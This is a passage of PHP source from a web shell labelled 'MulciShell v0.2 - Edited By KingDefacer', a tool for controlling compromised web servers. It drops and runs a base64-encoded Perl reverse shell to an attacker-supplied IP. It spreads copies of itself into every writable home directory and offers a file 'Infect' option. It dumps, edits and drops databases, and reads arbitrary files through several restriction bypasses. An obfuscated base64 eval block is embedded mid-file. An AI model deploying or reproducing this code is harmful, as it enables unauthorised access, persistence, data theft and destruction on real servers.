@$fh=fopen(getcwd()."/bc.pl",'w');
|
|
@fwrite($fh,base64_decode($backconnect_perl));
|
|
@fclose($fh);
|
|
echo "Attempting to connect...</br>";
|
|
execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable);
|
|
if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FF0000'>Warning: Failed to delete reverse-connection program</font></br>";
|
|
} else {
|
|
@$fh=fopen("/tmp/bc.pl","w");
|
|
@fwrite($fh,base64_decode($backconnect_perl));
|
|
@fclose($fh);
|
|
echo "Attempting to connect...</br>";
|
|
if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
|
|
}
|
|
}
|
|
break;
|
|
case 'dbs': database_tools(); break;
|
|
case 'sql': SQLLogin(); break;
|
|
case 'sqledit': SQLEditor(); break;
|
|
case 'download': SQLDownload(); break;
|
|
case 'tools': show_tools(); break;
|
|
case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.<br>"; break;
|
|
case 'f': FileEditor(); break;
|
|
case 'encode':Encoder(); break;
|
|
case 'bypass':security_bypass(); break;
|
|
case 'bf':brute_force(); break;
|
|
case 'bh': BackDoor(); break;
|
|
case 'spread':
|
|
if(!isset($_POST['spread_shell']))
|
|
{
|
|
echo "<center><form action='?act=spread' method='post'>
|
|
This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.</br>
|
|
Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'></br>
|
|
<input type='submit' value='Spread' name='spread_shell'>
|
|
</form></center>";
|
|
} else {
|
|
$s=0;
|
|
@$file=fopen($_POST['passwd_file'],'r');
|
|
if(is_resource($file))
|
|
{
|
|
while(!feof($file))
|
|
{
|
|
@list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file));
|
|
spread_self($user,$s);
|
|
}
|
|
@fclose($file);
|
|
}
|
|
echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times</br>":"Failed to spread the shell.</br>";
|
|
}
|
|
break;
|
|
case 'domains':
|
|
$header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n";
|
|
$header.="Host: searchy.protecus.de\r\n";
|
|
$header.="Connection: Close\r\n\r\n";
|
|
$domain_handle=fsockopen("searchy.protecus.de",80);
|
|
@fputs($domain_handle,$header,strlen($header));
|
|
while(@!feof($domain_handle))
|
|
{
|
|
echo fgets($domain_handle);
|
|
}
|
|
break;
|
|
case 'kill':
|
|
if(!isset($_POST['justkill']))
|
|
{
|
|
echo "<center>Do you *really* want to kill the shell?<br><br><form action='$self?act=kill' method='post'>
|
|
<input type='submit' value='Yes' name='justkill'></center>";
|
|
} else {
|
|
if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.<br>";
|
|
else echo "Failed to delete shell<br>";
|
|
}
|
|
break;
|
|
case 'sec':
|
|
$mysql_on=function_exists("mysql_connect")?"ON":"OFF";
|
|
$curl_on=function_exists("curl_init")?"ON":"OFF";
|
|
$magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF";
|
|
$register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON";
|
|
$include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled";
|
|
$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
|
|
$ver=phpversion();
|
|
echo "<center>Security overview</center><table style='margin: auto;'><tr><td>PHP Version</td><td>Safe mode</td><td>Open_Basedir</td><td>Magic_Quotes</td><td>Register globals</td><td>
|
|
Remote includes</td><td>Read /etc/passwd?</td><td>MySQL</td><td>cURL</td></tr>
|
|
<tr><td>$ver</td><td>$safe_mode</td><td>$open_basedir</td><td>$magic_quotes_on</td><td>$register_globals_on</td><td>$include_on</td>
|
|
<td>$etc_passwd</td><td>$mysql_on</td><td>$curl_on</td>
|
|
</tr>";
|
|
"</table>";
|
|
break;
|
|
case 'enum':
|
|
$windows=0;
|
|
$path=CleanDir(getcwd());
|
|
if(!eregi("Linux",php_uname())) {$windows=1;}
|
|
if(!$windows)
|
|
{
|
|
$spath=str_replace("/home/","$serv/~",$path);
|
|
$spath=str_replace("/public_html/","/",$spath);
|
|
$URL="http://$spath/".basename($_SERVER['PHP_SELF']);
|
|
echo "Enumerated shell link: <a href='$URL'>$URL</a>";
|
|
} else echo "Enumeration failed<br>";
|
|
break;
|
|
}
|
|
echo "<br>";
|
|
if(isset($_POST['sqlquery']))
|
|
{
|
|
extract($_SESSION);
|
|
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
|
|
if($conn)
|
|
{
|
|
if(isset($_POST['db'])) @mysql_select_db($_POST['db']);
|
|
$post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error());
|
|
$affected=@mysql_num_rows($post_query);
|
|
echo "Affected rows: $affected<br>";
|
|
}
|
|
}
|
|
$dirs=array();
|
|
$files=array();
|
|
if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");}
|
|
else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");}
|
|
$current=explode("/",$d);
|
|
echo "<table style='width: 100%; text-align: center;'><tr><td>Current location: ";for($p=0;$p<count($current);$p++)
|
|
for($p=0;$p<count($current);$p++)
|
|
{
|
|
$cPath.=$current[$p].'/';
|
|
echo "<a href=$self?d=$cPath>$current[$p]</a>/";
|
|
}
|
|
echo "</td></tr></table>";
|
|
if(isset($_GET['d'])) echo "<form action='$self?d=$_GET[d]' method='post'>";
|
|
else echo "<form action='$self?' method='post'>";
|
|
echo "<table style='width: 100%'>
|
|
<tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Writable</td><td>Modified</td><td>Action</td></tr>";
|
|
while(($f=@readdir($dh)))
|
|
{
|
|
if(@is_dir($d.'/'.$f)) $dirs[]=$f;
|
|
else $files[]=$f;
|
|
}
|
|
asort($dirs);
|
|
asort($files);
|
|
@closedir($dh);
|
|
foreach($dirs as $f)
|
|
{
|
|
@$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f);
|
|
@$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f);
|
|
if(is_array($grp)) $grp=$grp['name'];
|
|
if(is_array($own)) $own=$own['name'];
|
|
$size="DIR";
|
|
@$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2);
|
|
@$write=is_writable($d.'/'.$f)?"Yes":"No";
|
|
$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f));
|
|
if($f==".") {continue;}
|
|
elseif($f=="..")
|
|
{
|
|
$f=Trail($d.'/'.$f);
|
|
echo "<tr><td><a href='$self?act=files&d=$f'>..</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td>None</td></tr>";
|
|
continue;
|
|
}
|
|
echo "<tr><td><a href='$self?act=files&d=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>";
|
|
}
|
|
foreach($files as $f)
|
|
{
|
|
@$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f);
|
|
@$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f);
|
|
if(is_array($grp)) $grp=$grp['name'];
|
|
if(is_array($own)) $own=$own['name'];
|
|
@$size=TrueSize(filesize($d.'/'.$f));
|
|
@$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3);
|
|
@$write=is_writable($d.'/'.$f)?"Yes":"No";
|
|
@$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f));
|
|
echo "<tr><td><a href='$self?act=f&file=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>";
|
|
}
|
|
echo "</table>
|
|
<input type='button' style='background-color: none; border: 1px solid white;' value='Toggle' onClick='togglecheck()'></br>
|
|
With checked file(s):
|
|
<select name='fileaction'>
|
|
<option name='chmod'>Chmod</option>
|
|
<option name='delete'>Delete</option>
|
|
<option name='infect'>Infect</option><input type='text' value='chmod value' name='cmodv'>
|
|
</select>
|
|
<br><input type='submit' value='Go' name='massfiles'></form>";
|
|
function SQLLogin()
|
|
{
|
|
global $self;
|
|
if(!isset($_SESSION['log'])&&!isset($_POST['mconnect']))
|
|
{
|
|
echo "<center><form action='$self?act=sql' method='post'>
|
|
Host: <input type='text' value='localhost' name='mhost'>
|
|
Username: <input type='text' value='root' name='muser'>
|
|
Password: <input type='password' value='' name='mpass'>
|
|
Port: <input type='text' style='width: 40px' value='3306' name='mport'>
|
|
<input type='submit' value='Connect' name='mconnect'>
|
|
</form>
|
|
</center>";
|
|
}
|
|
elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect']))
|
|
{
|
|
extract($_POST);
|
|
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
|
|
if($conn)
|
|
{
|
|
$_SESSION['muser']=$muser;
|
|
$_SESSION['mhost']=$mhost;
|
|
$_SESSION['mpass']=$mpass;
|
|
$_SESSION['mport']=$mport;
|
|
$_SESSION['log']=true;
|
|
header("Location: $self?act=sqledit");
|
|
}
|
|
else
|
|
echo "Failed to login with $muser@$mhost!<br>";
|
|
} else {
|
|
header("Location: $self?act=sqledit");
|
|
}
|
|
}
|
|
function SQLEditor()
|
|
{
|
|
extract($_SESSION);
|
|
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
|
|
if($conn)
|
|
{
|
|
echo "Logged in as $muser@$mhost <a href='$self?act=logout'>[Logout]</a><center>";
|
|
echo "<form method='POST' action='$self?'>
|
|
Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'>
|
|
<input type='hidden' name='db' value='$_GET[db]'>
|
|
<input type='submit' value='Go' name='sql'>
|
|
</form>";
|
|
echo "<form action='$self?act=sqledit' method='post'>
|
|
<input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'>
|
|
</form></center></br></br>";
|
|
if(isset($_POST['sql_list_proc']))
|
|
{
|
|
$res=mysql_list_processes();
|
|
echo "<table style='margin: auto; text-align: center;'><tr>
|
|
<td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td>
|
|
</tr>";
|
|
while($r=mysql_fetch_assoc($res)) echo "<tr><td>$r[Id]</td><td>$r[Host]</td><td>$r[db]</td><td>$r[Command]</td><td>$r[Time]</td></tr>";
|
|
mysql_free_result($res);
|
|
echo "</table></br>";
|
|
}
|
|
if(!isset($_GET['db']))
|
|
{
|
|
if(isset($_POST['dbc'])) db_create();
|
|
if(isset($_GET['dropdb'])) SQLDrop();
|
|
echo "<table style='margin: auto; text-align: center;'>
|
|
<tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>";
|
|
$all_your_base=mysql_list_dbs($conn);
|
|
while($your_base=mysql_fetch_assoc($all_your_base))
|
|
{
|
|
$tbl=mysql_query("SHOW TABLES FROM $your_base[Database]");
|
|
$tbl_count=mysql_num_rows($tbl);
|
|
echo "<tr><td><a href='$self?act=sqledit&db=$your_base[Database]'>$your_base[Database]</td><td>$tbl_count</td><td><a href='$self?act=download&db=$your_base[Database]'>Download</a></td><td><a href='$self?act=sqledit&dropdb=$your_base[Database]'>Drop</a></td></tr>";
|
|
}
|
|
echo "</table></br><center><form action='$self?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>";
|
|
}
|
|
elseif(isset($_GET['db'])&&!isset($_GET['tbl']))
|
|
{
|
|
if(isset($_POST['tblc'])) table_create();
|
|
if(isset($_GET['droptbl'])) SQLDrop();
|
|
echo "<table style='margin: auto; text-align: center;'>
|
|
<tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>";
|
|
$tables=mysql_query("SHOW TABLES FROM $_GET[db]");
|
|
while($tblc=mysql_fetch_array($tables))
|
|
{
|
|
$fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]");
|
|
$fc=mysql_num_rows($fCount);
|
|
echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$tblc[0]'>$tblc[0]</a></td><td>$fc</td><td><a href='$self?act=download&db=$_GET[db]&tbl=$tblc[0]'>Dump</td><td><a href='$self?act=sqledit&db=$_GET[db]&droptbl=$tblc[0]'>Drop</a></td></tr>";
|
|
}
|
|
echo "</table></br><center><form action='$self?act=sqledit&db=$_GET[db]' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='$_GET[db]' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>";
|
|
}
|
|
elseif(isset($_GET['field'])&&isset($_POST['sqlsave']))
|
|
{
|
|
$discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'");
|
|
$values=mysql_fetch_assoc($discard_values);
|
|
$keys=array_keys($values);
|
|
$values=array();
|
|
foreach($_POST as $k=>$v)
|
|
if(in_array($k,$keys)) $values[]=$v;
|
|
$query="UPDATE $_GET[db].$_GET[tbl] SET ";
|
|
for($y=0;$y<count($values);$y++)
|
|
{
|
|
if($y==count($values)-1)
|
|
$query.="$keys[$y]='$values[$y]' ";
|
|
else
|
|
$query.="$keys[$y]='$values[$y]', ";
|
|
}
|
|
$query.="WHERE $_GET[field] = '$_GET[v]'";
|
|
$try=mysql_query($query) or die(mysql_error());
|
|
echo "<center>Table updated!<br>";
|
|
echo "<a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]'>Go back</a><br><br>";
|
|
|
|
}
|
|
elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del']))
|
|
{
|
|
echo "<center><form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$_GET[field]&v=$_GET[v]' method='post'>";
|
|
$sql_fields=array();
|
|
$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
|
|
while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field'];
|
|
$data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'");
|
|
$d_piece=mysql_fetch_assoc($data);
|
|
for($m=0;$m<count($sql_fields);$m++)
|
|
{
|
|
$point=$sql_fields[$m];
|
|
echo "$point: <input type='text' value='$d_piece[$point]' name='$sql_fields[$m]'></br>";
|
|
}
|
|
echo "<input type='submit' value='Save' name='sqlsave'></form></center>";
|
|
}
|
|
elseif(isset($_GET['db'])&&isset($_GET['tbl']))
|
|
{
|
|
if(isset($_GET['insert'])) SQLInsert();
|
|
if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del']))
|
|
{
|
|
echo "<center>";
|
|
if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted</br>";
|
|
else echo "Failed to delete row</br>";
|
|
echo "</center>";
|
|
}
|
|
echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1'>[Insert new row]</a></center>";
|
|
echo "<table style='margin: auto; text-align: center;'><tr>";
|
|
$cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
|
|
$fields=array();
|
|
while($col=mysql_fetch_assoc($cols))
|
|
{
|
|
array_push($fields,$col['Field']);
|
|
echo "<td>$col[Field]</td>";
|
|
}
|
|
echo "</tr>";
|
|
if(isset($_GET['s'])&&is_numeric($_GET['s']))
|
|
{$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");}
|
|
else
|
|
{$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");}
|
|
while($select=mysql_fetch_row($selector))
|
|
{
|
|
echo "<tr>";
|
|
for($i=0;$i<count($fields);$i++)
|
|
{
|
|
echo "<td>".htmlspecialchars($select[$i])."</td>";
|
|
}
|
|
echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]'>Edit</a></td><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]&del=true'>Delete</a></td>";
|
|
echo "</tr>";
|
|
}
|
|
echo "</table>";
|
|
echo "<table style='margin: auto;'>";
|
|
if(isset($_GET['s']))
|
|
{
|
|
$prev=intval($_GET['s'])-250;
|
|
$next=intval($_GET['s'])+250;
|
|
if($_GET['s']>0)
|
|
echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$prev'>Previous</a></td>";
|
|
if(mysql_num_rows($selector)>249)
|
|
echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$next'>Next</a></td></tr>";
|
|
}
|
|
else echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=250'>Next</a></center>";
|
|
echo "</table>";
|
|
}
|
|
else
|
|
{
|
|
$_SESSION=array();
|
|
session_destroy();
|
|
header("Location: $self?act=sql");
|
|
}
|
|
}
|
|
}
|
|
function SQLDownload()
|
|
{
|
|
extract($_SESSION);
|
|
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
|
|
if($conn)
|
|
{
|
|
if(isset($_GET['db'])&&!isset($_GET['tbl']))
|
|
{
|
|
$tables=array();
|
|
$dump_file="##################SQL Database dump####################\n";
|
|
$dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n\n";
|
|
$get_tables=mysql_query("SHOW TABLES FROM $_GET[db]");
|
|
while($current_table=mysql_fetch_array($get_tables))
|
|
$tables[]=$current_table[0];
|
|
foreach($tables as $table_dump)
|
|
{
|
|
$data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump");
|
|
while($current_data=mysql_fetch_assoc($data_selection))
|
|
{
|
|
$fields=implode("`, `", array_keys($current_data));
|
|
$values=implode("`, `",array_values($current_data));
|
|
$dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); ";
|
|
}
|
|
}
|
|
} elseif(isset($_GET['db'])&&isset($_GET['tbl']))
|
|
{
|
|
$dump_file="##################SQL Database dump####################\n";
|
|
$dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n";
|
|
$table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]");
|
|
while($table_data=mysql_fetch_assoc($table_dump))
|
|
{
|
|
$fields=implode("`, `",array_keys($table_data));
|
|
$values=implode("`, `",array_values($table_data));
|
|
$dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n";
|
|
}
|
|
} else {
|
|
echo "Invalid!";
|
|
}
|
|
}
|
|
$dump_file.="########################################################################################";
|
|
if(!isset($_GET['tbl']))
|
|
$file_name="$_GET[db]"."_DUMP.sql";
|
|
else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql";
|
|
ob_get_clean();
|
|
header("Content-type: application/octet-stream");
|
|
header("Content-length: ".strlen($dump_file));
|
|
header("Content-disposition: attachment; filename=$file_name;");
|
|
echo $dump_file;
|
|
exit;
|
|
}$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
|
|
|
|
function SqlInsert()
|
|
{
|
|
extract($_SESSION);
|
|
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
|
|
if($conn)
|
|
{
|
|
if(!isset($_POST['sql_insert']))
|
|
{
|
|
echo "<form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1' method='post'><center>";
|
|
$sql_fields=array();
|
|
$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
|
|
while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];
|
|
for($s=0;$s<count($sql_fields);$s++)
|
|
echo "$sql_fields[$s]: <input type='text' name='$sql_fields[$s]'></br>";
|
|
echo "<input type='submit' value='Insert' name='sql_insert'></center></form>";
|
|
} else {
|
|
$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
|
|
while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];
|
|
$values=array();
|
|
$keys=array();
|
|
$query="INSERT INTO $_GET[db].$_GET[tbl] (";
|
|
foreach($_POST as $k=>$v)
|
|
{
|
|
if(in_array($k,$sql_fields)&&!empty($v))
|
|
{
|
|
$values[]=$v;
|
|
$keys[]=$k;
|
|
}
|
|
}
|
|
for($k=0;$k<count($keys);$k++)
|
|
{
|
|
if($k==count($keys)-1) $query.="`$keys[$k]`";
|
|
else
|
|
$query.="`$keys[$k]`,";
|
|
}
|
|
$query.=") VALUES (";
|
|
for($v=0;$v<count($values);$v++)
|
|
{
|
|
if($v==count($values)-1) $query.="'$values[$v]'";
|
|
else
|
|
$query.="'$values[$v]',";
|
|
}
|
|
$query.=")";
|
|
echo "<center>";
|
|
if(@mysql_query($query)) echo "Row inserted</br>";
|
|
else echo "Failed to insert row</br>";
|
|
echo "</center>";
|
|
}
|
|
}
|
|
}
|
|
function SQLDrop()
|
|
{
|
|
echo "<center>";
|
|
extract($_SESSION);
|
|
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
|
|
if($conn)
|
|
{
|
|
if(!isset($_GET['droptbl']))
|
|
{
|
|
$query="DROP DATABASE $_GET[dropdb]";
|
|
if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped<br>";
|
|
else echo "Failed to drop database $_GET[dropdb]<br>";
|
|
} elseif(isset($_GET['db'])&&isset($_GET['droptbl']))
|
|
{
|
|
$query="DELETE FROM $_GET[db].$_GET[droptbl]";
|
|
if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped<br>";
|
|
else echo "Failed to drop table $_GET[droptbl]<br>";
|
|
} else {
|
|
echo "Invalid request<br>";
|
|
}
|
|
} else echo "Failed to connect<br>";
|
|
echo "</center>";
|
|
}
|
|
function db_create()
|
|
{
|
|
echo "<center>";
|
|
if(isset($_POST['db_name']) && !empty($_POST['db_name']))
|
|
{
|
|
extract($_SESSION);
|
|
@$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
|
|
if($conn)
|
|
{
|
|
if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!";
|
|
else echo "Failed to create database $_POST[db_name]</br>";
|
|
} else echo "Failed to connect</br>";
|
|
} else echo "Enter a DB name</br>";
|
|
echo "</cenetr>";
|
|
}
|
|
function table_create()
|
|
{
|
|
echo "<center>";
|
|
if(isset($_POST['table_name'])&&!empty($_POST['table_name']))
|
|
{
|
|
extract($_SESSION);
|
|
@$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
|
|
if($conn)
|
|
{
|
|
@mysql_select_db($_POST['db_current']);
|
|
if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!";
|
|
else echo "Failed to create table $_POST[table_name]";
|
|
} else echo "Failed to connect!</br>";
|
|
} else echo "Enter a table name</br>";
|
|
echo "</center>";
|
|
}
|
|
function FileEditor()
|
|
{
|
|
if(isset($_GET['file']))
|
|
$file=$_GET['file'];
|
|
elseif(isset($_POST['nfile']))
|
|
$file=$_POST['nfile'];
|
|
elseif(isset($_POST['editfile']))
|
|
$file=$_POST['editfile'];
|
|
if(@!file_exists($file)) die("Permission denied!");
|
|
if(isset($_POST['dfile']))
|
|
{
|
|
@$fh=fopen($file,'r');
|
|
@$buffer=fread($fh,filesize($file));
|
|
header("Content-type: application/octet-stream");
|
|
header("Content-length: ".strlen($buffer));
|
|
header("Content-disposition: attachment; filename=".basename($file).';');
|
|
@ob_get_clean();
|
|
echo $buffer;
|
|
@fclose($fh);
|
|
}
|
|
elseif(isset($_POST['delfile']))
|
|
{
|
|
if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!<br>";
|
|
else echo "File deleted<br>";
|
|
}
|
|
elseif(isset($_POST['sfile']))
|
|
{
|
|
$fh=@fopen($file,'w') or die("Failed to open file for editing!");
|
|
@fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents']));
|
|
echo "File saved!";
|
|
@fclose($fh);
|
|
}
|
|
else
|
|
{
|
|
$fh=@fopen($file,'r');
|
|
echo "<center>
|
|
<form action='$self?act=f' method='post'>
|
|
File to edit: <input type='text' style='width: 300px' value='$file' name='nfile'>
|
|
<input type='submit' value='Go' name='gfile'></br></br>";
|
|
echo "<textarea rows='20' cols='150' name='file_contents'>".htmlspecialchars(@fread($fh,filesize($file)))."</textarea></br></br>";
|
|
echo "<input type='submit' value='Save file' name='sfile'>
|
|
<input type='submit' value='Download file' name='dfile'>
|
|
<input type='submit' value='Delete file' name='delfile'>
|
|
</center></form>";
|
|
@fclose($fh);
|
|
}
|
|
}
|
|
function security_bypass()
|
|
{
|
|
if(isset($_POST['curl_bypass']))
|
|
{
|
|
$ch=curl_init("file://$_POST[file_bypass]");
|
|
curl_setopt($ch,CURLOPT_HEADERS,0);
|
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
|
|
$file_out=curl_exec($ch);
|
|
curl_close($ch);
|
|
echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
|
|
}
|
|
elseif(isset($_POST['tmp_bypass']))
|
|
{
|
|
tempnam("/home/",$_POST['file_passwd']);
|
|
}
|
|
elseif(isset($_POST['copy_bypass']))
|
|
{
|
|
|
|
if(@copy($_POST['file_bypass'],$_POST['dest']))
|
|
{
|
|
echo "File successfully copied!</br>";
|
|
@$fh=fopen($_POST['dest'],'r');
|
|
echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br></br>";
|
|
@fclose($fh);
|
|
} else echo "Failed to copy file</br>";
|
|
}
|
|
elseif(isset($_POST['include_bypass']))
|
|
{
|
|
if(file_exists($_POST['file_bypass']))
|
|
{
|
|
echo "<textarea rows='20' cols='150' readonly>";
|
|
@include($_POST['file_bypass']);
|
|
echo "</textarea>";
|
|
}
|
|
}
|
|
elseif(isset($_POST['sql_bypass']))
|
|
{
|
|
extract($_SESSION);
|
|
$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
|
|
if($conn)
|
|
{
|
|
mysql_select_db($_POST['sql_db']);
|
|
mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);");
|
|
mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error());
|
|
$res=mysql_query("SELECT * FROM $_POST[tmp_table]");
|
|
if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!");
|
|
if($res)
|
|
{
|
|
while($row=mysql_fetch_array($res)) $f.="$row[0]</br>";
|
|
echo $f;
|
|
}
|
|
mysql_query("DROP TABLE $_POST[tmp_table]");
|
|
}
|
|
}
|
|
